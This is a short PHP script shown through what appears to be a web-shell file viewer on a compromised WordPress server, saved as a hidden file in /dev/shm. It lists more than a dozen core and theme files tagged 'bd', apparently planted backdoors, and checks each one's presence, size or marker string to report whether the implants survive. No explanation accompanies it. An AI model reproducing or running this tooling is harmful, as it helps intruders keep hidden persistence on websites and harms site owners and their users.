Current File : //proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/dev/shm/.pgrp |
<?php $r = '/home/spargrew/mimiparty.sparxtechsolutions.com'; $x = ["/wp-load.php"=>"bd@@28305@@config_manager",
"/wp-content/themes/kadence/inc/components/jetpack/template_blog.php"=>"bd@@18728@@666",
"/wp-content/themes/kadence/inc/components/options/action.topic.php"=>"bd@@18785@@1928",
"/wp-includes/shortcodes.php"=>"bd@@28313@@hub_center",
"/wp-includes/theme-compat/sidebar.php"=>"bd@@73884@@dataflow_engine",
"/wp-includes/https-detection.php"=>"bd@@28317@@framework",
"/wp-links-opml.php"=>"bd@@28321@@event_dispatcher",
"/wp-content/themes/twentytwentyfive/patterns/banner-intro.php"=>"bd@@73893@@dataflow_engine",
"/wp-includes/Requests/src/Exception/Http/functions.cache.php"=>"bd@@28327@@1637",
"/wp-content/themes/kadence/template-parts/content/entry.tags.php"=>"bd@@28328@@648",
"/wp-content/themes/kadence/inc/customizer/class.font.sanitize.php"=>"bd@@28329@@661",
"/wp-includes/SimplePie/src/HTTP/sendmail.php"=>"bd@@28331@@1688",
"/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-3-col.php"=>"bd@@66995@@framework",
"/wp-includes/sodium_compat/src/Core/Poly1305/State.php"=>"bd@@67004@@unit_converter"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');